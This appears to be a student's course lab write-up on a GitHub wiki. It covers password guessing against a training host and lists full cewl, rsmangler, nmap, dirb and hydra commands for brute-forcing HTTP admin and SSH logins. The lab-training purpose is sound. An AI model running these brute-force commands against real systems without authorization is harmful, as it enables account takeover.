Lab 5.1 Password Guessing - FlameSpyro/Tech-Journal GitHub Wiki

Lab 5.1 - Password Guessing

About

  • This lab involves us using 10.0.5.21 to use tools to gain user information and get into admin parts of the site.

Steps

  • Deliverable 1. Provide a screenshot that shows the lookup and reported hostname. nslookup 10.0.5.21 10.0.5.22

    • Running some quicker tests to try and uncover a few accounts that may be using easy-to-guess passwords may provide a simple initial foothold. We will come back to other password-cracking techniques later in the exploit stage - as many of them are more beneficial once you have some access to the systems.

    • Password-guessing tools use wordlists/dictionaries to test combinations of usernames and passwords. Many files are available to download but crawling websites is a useful way to gather words/usernames that may be uniquely associated with a particular organization.

    • The Custom Wordlist Generator(cewl) included in Kali, crawls websites and creates a custom wordlist. Spend some time reading the man page. You will need to play with the depth flag to single out a member's biography. Cewl has some issues and we will work through them as they appear.

    • I used cewl to create a custom wordlist for the shire bio pages of Frodo, Pippin, Bilbo and Samwise from http://10.0.5.21/bios. Make sure you crawl the full page as opposed to the shortened version.

  • For this list its best to:

    • Unique words
    • Proper Nouns
    • Each user gets their own txt

  • Heres what I got:

cewl -d 1 -v http://10.0.5.21/bios/frodo -w frodoPass.txt
cewl -d 1 -v http://10.0.5.21/bios/pippin -w pippinPass.txt
cewl -d 1 -v http://10.0.5.21/bios/bilbo -w bilboPass.txt
cewl -d 1 -v http://10.0.5.21/bios/samwise -w samwisePass.txt

Mangling the Wordlist

  • Making variants of your list of plaintext words is useful. Cagey users want an easy to remember password but they also want to obfuscate it just a bit to feel secure.

rsmangler

  • rsmangler is a tool that takes wordlists and "mangles" them by adding, leet speak, numbers, years, mix case, special characters and various other flags.

  • Heres what I used:

rsmangler --file bilboPassSmall.txt -x 12 -m 9  -l -s -e -i -p -u  -a --output bilbo.mangled.txt
rsmangler --file frodoPassSmall.txt -x 12 -m 9  -l -s -e -i -p -u  -a --output frodo.mangled.txt
rsmangler --file pippinPassSmall.txt -x 12 -m 9  -l -s -e -i -p -u  -a --output pippin.mangled.txt
rsmangler --file samwisePassSmall.txt -x 12 -m 9  -l -s -e -i -p -u  -a --output samwise.mangled.txt

  • rsmangler options:

    • -x: Max words
    • -m: Min words
    • -l: lowercase the word
    • -p: Permutate all words
    • -s: swap the case of the word
    • -e: add ed to the end of the word
    • -i: adds -ing to the end of the word
    • -u: uppercase the word
    • -a: create an acronym based on all the words entered in order and add to word list

  • You can verify using

wc -l *PassSmall.txt
wc -l *mangled.txt

Password Guessing

  • Deliverable 2. Using what you have during the reconnaissance modules, run a scan to determine any listening tcp services to include the service versions. Provide a screenshot of both your command and results. nmap -sV 10.0.5.21

  • Deliverable 3. Let's see if we can get a little more information on your website such as hidden directories. Research the dirb command and run it against the webserver. Turn off recursion. Provide a screenshot of anything secret you've found. dirb http://10.0.5.21 -r -w

    • -r: don't search recursively
    • -w: Do not stop on warning messages

  • Deliverable 4. Provide a screenshot that displays a prompt when attempting to access a protected directory.

  • In Kali chrome enter: 10.0.5.21/admin

  • Note: Check out Medusa, ncrack, hydra for options

Crackin the http password

  • The usernames for our http password protected case will be just the first names for our characters. Such as samwise, pippen, bilbo and frodo.
  • Deliverable 5. For at least 3 shire staff, bypass authentication on the protected directory using the tool of your choice. Provide screenshot(s) showing the tool execution and the guessed password. (Make sure you validate all of these work)
  • In this, I used hydra since I used it in a previous lab
hydra -l bilbo -P bilbo.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
hydra -l frodo -P frodo.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
hydra -l pippin -P pippin.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
hydra -l samwise -P samwise.mangled.txt -s 80 -f 10.0.5.21 http-get /admin/
  • BAM! We got login information
  • Deliverable 5: hydra commands + successful logins

Brute Forcing System Accounts

*Brute-forcing web logins can be much faster than some other services. SSH, for example, will often tear-down sessions after 3 failed logins which can slow down password guessing attacks

  • The target server also has SSH login accounts for the same staff members though their names are formatted first.lastname. (pippin is a nickname (not a first name) and wouldn't be used)

  • Deliverable 6. Submit screenshots of your tool of choice reporting successful ssh password guesses of at least 3 member's linux accounts.

  • Heres the commands I used

hydra -l bilbo.baggins -P bilbo.mangled.txt 10.0.5.21 -t 4 ssh
hydra -l frodo.baggins -P frodo.mangled.txt 10.0.5.21 -t 4 ssh
hydra -l samwise.gamgee -P samwise.mangled.txt 10.0.5.21 -t 4 ssh

  • WARNING This took about 2-4 hours to do and for me didn't fully work potentially due to my wordlist being too cleared

  • Test through ssh [email protected]

Reflection

  • When it comes to my passwords, mine aren't really that guessable, it's all about if you know my very very specific interest. I don't like to keep track but some are shared depending on importance. I don't believe its in a rockyou like list. I keep track of passwords on physical means but mostly through memory.